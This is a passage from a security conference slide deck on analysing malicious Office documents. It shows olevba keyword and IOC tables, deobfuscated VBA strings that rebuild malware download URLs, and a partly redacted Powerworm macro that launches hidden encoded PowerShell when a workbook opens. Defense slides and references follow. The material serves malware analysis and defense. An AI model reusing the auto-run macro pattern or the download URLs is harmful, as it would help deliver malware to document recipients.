| Suspicious | Open | May open a file |
| Suspicious | Shell | May run an executable file or a system |
| | | command |
| Suspicious | WScript.Shell | May run an executable file or a system |
| | | command |
| Suspicious | MkDir | May create a directory |
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings |
| Suspicious | FileCopy | May copy a file |
| Suspicious | CreateTextFile | May create a text file |
| Suspicious | SaveToFile | May create a text file |
| Suspicious | Environ | May read system environment variables |
| Suspicious | Write | May write to a file (if combined with |
| | | Open) |
| Suspicious | Output | May write to a file (if combined with |
| | | Open) |
© Fidelis Cybersecurity. All rights reserved. 56
![Page 58: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/58.jpg)
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| Suspicious | Print # | May write to a file (if combined with |
| | | Open) |
| Suspicious | Shell.Application | May run an application (if combined |
| | | with CreateObject) (obfuscation: VBA |
| | | expression) |
| Suspicious | ADODB.Stream | May create a text file (obfuscation: |
| | | VBA expression) |
| Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
| | | (obfuscation: VBA expression) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
| Suspicious | VBA obfuscated | VBA string expressions were detected, |
| | Strings | may be used to obfuscate strings |
| | | (option --decode to see all) |
| IOC | http://www.schmidks. | URL |
| | de | |
| IOC | http://www.StealthBo | URL |
| | t.net/sb/Launcher/ | |
| IOC | zzA.exe | Executable file name (obfuscation: VBA |
| | | expression) |
© Fidelis Cybersecurity. All rights reserved. 57
![Page 59: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/59.jpg)
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| VBA string | ;<=Shell.Application | (";<=" + Chr(83) & "h" & "e" & Chr(108) |
| | | & Chr(108) & Chr(46) & Chr(65) & "p" & |
| | | Chr(112) & Chr(108) & Chr(105) & |
| | | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
| | | & Chr(111) & Chr(110)) |
| VBA string | Dim,Wb,Err,Number,De | "Dim" & "," & "Wb" & "," & |
| | scription,Source,Cou | "Err" & "," & "Number" & "," & |
| | nt,File,Folder,Scrip | "Description" & "," & "Source" & |
| | ting,Boolean,String, | "," & "Count" & "," & "File" & |
| | Integer,addModule,re | "," & "Folder" & "," & |
| | turnValue,retVal,fil | "Scripting" & "," & "Boolean" & "," |
| | eName,saveChanges, | & "String" & "," & "Integer" & |
| | | "," & "addModule" & "," & |
| | | "returnValue" & "," & "retVal" & |
| | | "," & "fileName" & "," & |
| | | "saveChanges" & "," & "" |
| VBA string | Microsoft.XMLHTTP | (Chr(77) & Chr(105) & "c" & Chr(114) & |
| | | Chr(111) & Chr(115) & Chr(111) & |
| | | Chr(102) & "t" & Chr(46) & Chr(88) & |
| | | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
| | | & "P") |
© Fidelis Cybersecurity. All rights reserved. 58
![Page 60: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/60.jpg)
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| VBA string | \tmp_ | "\" & "tmp_" |
| VBA string | http://www.n | Chr(104) & Chr(116) & "t" & Chr(112) & |
| | | Chr(58) & "/" & "/" & Chr(119) & |
| | | Chr(119) & Chr(119) & Chr(46) & "n" |
| VBA string | GET | Chr(71) & "E" & Chr(84) |
| VBA string | orlabs.de/123/1111.e | Chr(111) & Chr(114) & Chr(108) & |
| | xe | Chr(97) & "b" & Chr(115) & Chr(46) & |
| | | Chr(100) & Chr(101) & Chr(47) & Chr(49) |
| | | & Chr(50) & Chr(51) & Chr(47) & Chr(49) |
| | | & Chr(49) & Chr(49) & Chr(49) & Chr(46) |
| | | & "e" & Chr(120) & "e" |
+------------+----------------------+-----------------------------------------+
© Fidelis Cybersecurity. All rights reserved. 59
![Page 61: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/61.jpg)
Debugging
© Fidelis Cybersecurity. All rights reserved. 60
![Page 62: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/62.jpg)
Vawtrak
© Fidelis Cybersecurity. All rights reserved. 61
(Trend Micro, 2015)
![Page 63: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/63.jpg)
Vawtrak
© Fidelis Cybersecurity. All rights reserved. 62
(Trend Micro, 2015)
![Page 64: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/64.jpg)
Vawtrak
© Fidelis Cybersecurity. All rights reserved. 63
![Page 65: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/65.jpg)
CRIGENT / Powerworm
Worm that uses Office Macros and Powershell
Private Sub Workbook_Open()
b = "JwBDAEkREDACTEDREDACTED" _
& "QA7ACcAcgREDACTEDREDACTED" _
& "BzACgAKQAREDACTEDREDACTED" _
& "jAGUAIAAtREDACTEDREDACTED" _
& "ACAAUwB5AREDACTEDREDACTED" _
& "GcALgBpAGREDACTEDREDACTED" _
& "4AIAAtAGEREDACTEDREDACTED" _
& "AdAAuAHAAREDACTEDREDACTED"
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
End Sub
‘ -encodedcommand – executes base64 encoded script and does not honor execution policy
‘ d586f8a60160cf3d1ef42c7424cab5b7
© Fidelis Cybersecurity. All rights reserved. 64
![Page 66: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/66.jpg)
CRIGENT / Powerworm
• Matt Graeber re-wrote, deobfuscated, and redacted
some parts of the worm https://github.com/mattifestation/PowerWorm
© Fidelis Cybersecurity. All rights reserved. 65
(Graeber, 2014)
![Page 67: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/67.jpg)
© Fidelis Cybersecurity. All rights reserved. 66
(Graeber, 2014)
![Page 68: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/68.jpg)
© Fidelis Cybersecurity. All rights reserved. 67
(Graeber, 2014)
![Page 69: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/69.jpg)
CRIGENT / Powerworm
© Fidelis Cybersecurity. All rights reserved. 68
(Graeber, 2014)
![Page 70: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/70.jpg)
CRIGENT / Powerworm
© Fidelis Cybersecurity. All rights reserved. 69
![Page 71: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/71.jpg)
© Fidelis Cybersecurity. All rights reserved. 70
(Graeber, 2014)
![Page 72: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/72.jpg)
Defense
© Fidelis Cybersecurity. All rights reserved. 71
![Page 73: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/73.jpg)
Defense
© Fidelis Cybersecurity. All rights reserved. 72
![Page 74: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/74.jpg)
Defense
© Fidelis Cybersecurity. All rights reserved. 73
![Page 75: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/75.jpg)
Other Strategies
• Applications Whitelisting
• Network ‘Whitelisting’ and Segmentation
• Monitoring!
© Fidelis Cybersecurity. All rights reserved. 74
![Page 76: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/76.jpg)
Conclusion
• Historically document malware was popular and then fell
out of fashion
• Recent resurgence in document malware downloaders
• Different formats utilized
• Bypass armoring of passwords and obfuscations
• Tools including pdfid, pdfparser, olevba, and Microsoft’s
built-in debugger
• Cases
© Fidelis Cybersecurity. All rights reserved. 75
![Page 77: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/77.jpg)
References Aloria. (2015). Security Reactions. Retrieved from http://securityreactions.tumblr.com/
Carnal0wnage (2011). Embeding A Link To A Network Share In A Word Doc. Retrieved from http://carnal0wnage.attackresearch.com/2011/11/embeding-link-to-network-share-in-word.html
Chantry, G. (2015). From the Labs: New developments in Microsoft Office malware. Retrieved from https://nakedsecurity.sophos.com/2015/03/06/from-the-labs-new-developments-in-microsoft-office-malware/
Decalge. (2015) Python Tools to Analyze OLE files. Retrieved from http://www.decalage.info/python/oletools
DFIR.IT (2015). Analyst’s Handbook - Analyzing Weaponized Documents. Retrieved from https://dfir.it/blog/2015/06/17/analysts-handbook-analyzing-weaponized-documents/
Ducklin, P. (2015). Why Word malware is BASIC: SophosLabs takes apart a booby-trapped document. Retrieved from https://blogs.sophos.com/2015/09/28/why-word-malware-is-basic/
Grooten, M. (2015). Vawtrak trojan spread through malicious Office macros. Retrieved from https://www.virusbtn.com/blog/2015/02_24.xml Grooten, M. (2014). Macro malware on the rise again. Retrieved from https://www.virusbtn.com/blog/2014/11_07.xml
Graeber, M. (2014). Analyzing the "Power Worm" PowerShell-based Malware. Retrieved from http://www.exploit-monday.com/2014/04/powerworm-analysis.html Gordon, S. (1995). What a (Winword.) Concept. Retrieved from https://www.virusbtn.com/pdf/magazine/1995/199509.pdf
Inocencio, R. (2014). Banking Trojan DRIDEX Uses Macros for Infection. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/
Joostbijl. (2014). Cryptolocker variant Torrentlocker making new victims in NL. Retrieved from http://blog.fox-it.com/2014/11/06/cryptolocker-variant-torrentlocker-making-new-victims-in-nl/
Kennedy, D. (2015). Unicorn. Retrieved from https://github.com/trustedsec/unicorn
Levene, B., Downs, R. (2015). Dridex is Back and Targeting the UK. Retrieved from http://researchcenter.paloaltonetworks.com/2015/10/dridex-is-back-and-targeting-the-uk/
Nieto, A. (2014). Word and Excel Files Infected Using Windows PowerShell. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/word-and-excel-files-infected-using-windows-powershell/
Ristow, M. (2015). CrunchCode – the obfuscator for VBA macros. Retrieved from http://www.crunchcode.de/en/index.html
Stevens, D. (2015). PDF + maldoc1 = maldoc2. Retrieved from https://isc.sans.edu/forums/diary/PDF+maldoc1+maldoc2/20079/
Stevens, D. (2015). PDF Tools. Retrieved from http://blog.didierstevens.com/programs/pdf-tools/
Szappanos, G. (2014). VBA is not dead. Retrieved from https://www.virusbtn.com/virusbulletin/archive/2014/07/vb201407-VBA
Talampas, C. (2015). Enterprises Hit by BARTALEX Macro Malware in Recent Spam Outbreak. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/enterprises-hit-by-bartalex-macro-malware-in-recent-spam-outbreak/
TrendMicro. (2015). Banking Malware VAWTRAK Now Uses Malicious Macros, Abuses Windows PowerShell. Retrieved from http://blog.trendmicro.com/trendlabs-security-intelligence/banking-malware-vawtrak-now-uses-malicious-macros-abuses-windows-powershell/ Whalley, I. (1999). Melissa – The Little Virus That Could… Retrieved from https://www.virusbtn.com/virusbulletin/archive/2015/06/vb201506-throwback-thursday-Melissa
Whipple, J.R. (n.d.). The Melissa Computer Virus. Retrieved from http://www.jrwhipple.com/melissa.html Yaneza, J. (2015). Macro Malware: When Old Tricks Still Work. Retrieved from https://blog.trendmicro.com/trendlabs-security-intelligence/macro-malware-when-old-tricks-still-work-part-1/
© Fidelis Cybersecurity. All rights reserved. 76
![Page 78: Back to the Future with Document Malware - SANS · Back to the Future with Document Malware SANS DFIR Summit ... Insert -> Object -> Text from File -> HTML file containing ... May](https://reader033.fdocuments.in/reader033/viewer/2022051509/5ade66fb7f8b9a213e8e0f22/html5/thumbnails/78.jpg)
QUESTIONS? THANK YOU!
• @tylerhalfpop tylerhalfpop.com | @FidSecSys fidelissecurity.com